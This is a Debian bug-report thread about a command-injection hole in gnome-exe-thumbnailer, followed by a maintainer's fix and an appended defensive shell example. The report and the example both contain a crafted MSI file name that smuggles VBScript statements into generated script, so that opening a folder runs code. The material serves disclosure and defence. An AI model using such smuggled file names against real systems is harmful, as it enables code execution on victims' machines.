I like that the patch is less code. Deleted code is debugged code! Btw, are you sure that using msiinfo does not introduce new bugs?
Cheers,
Nils

James Lu <bitfl...@gmail.com> writes:

> [ Unknown signature status ]
> Hi Nils,
>
> I wasn't able to reproduce the exploit on my (64-bit) system with either
> Caja or Nautilus (it also required setting up a new wineprefix in
> ~/.wine). The msi thumbnail ended up generating without any version
> information tag at all.
>
> Regardless, I've gone and replaced the VBScript-based parsing entirely
> with msitools' msiinfo in
> https://github.com/gnome-exe-thumbnailer/gnome-exe-thumbnailer/commit/1d8e3102dd8fd23431ae6127d14a236da6b4a4a5;
> hopefully this should fix the issue. I'll tag a new release soon and
> look at pushing the fix to Debian.
>
> (Also CC'ing the other maintainers, who I don't think are on the Debian
> Wine list)
>
> Best,
> James
>
> On 18/07/17 05:01 AM, Nils Dagsson Moskopp wrote:
>> Package: gnome-exe-thumbnailer
>> Version: 0.9.4-2
>> Severity: grave
>> Tags: security
>> Justification: user security hole
>>
>> Dear Maintainer,
>>
>> the following PoC is copied verbatim from my post about the parsing issue:
>> http://news.dieweltistgarnichtso.net/posts/gnome-thumbnailer-msi-fail.html
>>
>> Proof of Concept
>>
>> Install Dependencies
>>
>> On Debian GNU/Linux, install the packages gnome-exe-thumbnailer, nautilus
>> and wixl. The wixl package is only needed to create MSI files that trigger
>> the thumbnailer.
>>
>> If the proof of concept does not work, install winetricks and run winetricks
>> wsh56 to upgrade the Windows Script Host.
>>
>> Create MSI Files
>>
>> Create a file named poc.xml with the following content:
>>
>> <?xml version="1.0" encoding="utf-8"?>
>> <Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
>> <Product Version="1.0"/>
>> </Wix>
>>
>> Execute the following Bourne Shell code:
>>
>> wixl -o poc.msi poc.xml
>> cp poc.msi "poc.msi\",0):Set fso=CreateObject(\"Scripting.FileSystemObject\"):Set poc=fso.CreateTextFile(\"badtaste.txt\")'.msi"
>>
>> Trigger Execution
>>
>> Start GNOME Files and navigate to the folder with the MSI files. An empty
>> file with the name badtaste.txt should appear.
>>
>> *** End of the template - remove these template lines ***
>>
>>
>> -- System Information:
>> Debian Release: 9.0
>> APT prefers stable
>> APT policy: (500, 'stable')
>> Architecture: i386 (i686)
>>
>> Kernel: Linux 3.16.0-4-686-pae (SMP w/1 CPU core)
>> Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
>> Shell: /bin/sh linked to /bin/dash
>> Init: sysvinit (via /sbin/init)
>>
>> Versions of packages gnome-exe-thumbnailer depends on:
>> ii icoutils 0.31.2-1.1
>> ii imagemagick 8:6.9.7.4+dfsg-11
>> ii imagemagick-6.q16 [imagemagick] 8:6.9.7.4+dfsg-11
>> ii libglib2.0-bin 2.50.3-2
>>
>> Versions of packages gnome-exe-thumbnailer recommends:
>> pn wine <none>
>> pn wine64-tools | wine32-tools | wine64-development-tools | wine32-dev <none>
>>
>> gnome-exe-thumbnailer suggests no packages.
>>
>> -- no debconf information
>>
>> _______________________________________________
>> pkg-wine-party mailing list
>> pkg-wine-pa...@lists.alioth.debian.org
>> http://lists.alioth.debian.org/cgi-bin/mailman/listinfo/pkg-wine-party
>>
>

--
Nils Dagsson Moskopp // erlehmann
<http://dieweltistgarnichtso.net>
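
The bug class discussed in this thread, as an added example that is not part of the original messages or of gnome-exe-thumbnailer: a file name pasted into generated VBScript source, next to the same name encoded as a string literal first. The template line and the function names are hypothetical, and the file name is the one from the report; the fix referenced in the thread dropped the generated script entirely instead of escaping.

```shell
#!/bin/sh
# Added example; not gnome-exe-thumbnailer code. The template line and all
# function names are hypothetical. POC_NAME is the file name from the report.
POC_NAME="poc.msi\",0):Set fso=CreateObject(\"Scripting.FileSystemObject\"):Set poc=fso.CreateTextFile(\"badtaste.txt\")'.msi"

# Unsafe: the file name becomes part of the script source unchanged.
render_unsafe() {
    printf 'Set db = installer.OpenDatabase("%s", 0)\n' "$1"
}

# Encode a string as a VBScript string literal. Inside a literal only the
# double quote is special (written as ""); CR and LF end the statement, so
# names containing them are refused.
vbs_literal() {
    [ "$(printf '%s' "$1" | tr -d '\r\n')" = "$1" ] || return 1
    printf '"%s"' "$(printf '%s' "$1" | sed 's/"/""/g')"
}

# Safe: the name stays data because every quote in it is doubled.
render_safe() {
    lit=$(vbs_literal "$1") || return 1
    printf 'Set db = installer.OpenDatabase(%s, 0)\n' "$lit"
}

# Count the statements on one generated line: ':' separates statements
# outside string literals, and an apostrophe outside a literal starts a comment.
count_statements() {
    printf '%s\n' "$1" | awk '{
        n = 1; in_str = 0
        for (i = 1; i <= length($0); i++) {
            c = substr($0, i, 1)
            if (in_str) {
                if (c != "\"") continue
                if (substr($0, i + 1, 1) == "\"") i++   # "" is an escaped quote
                else in_str = 0
            } else if (c == "\"") in_str = 1
            else if (c == "\047") break                 # rest is a comment
            else if (c == ":") n++
        }
        print n
    }'
}

echo "unsafe: $(count_statements "$(render_unsafe "$POC_NAME")") statement(s)"
echo "safe:   $(count_statements "$(render_safe "$POC_NAME")") statement(s)"
```

A template that is meant to produce one statement and yields more than one after interpolation has had code added to it by the file name.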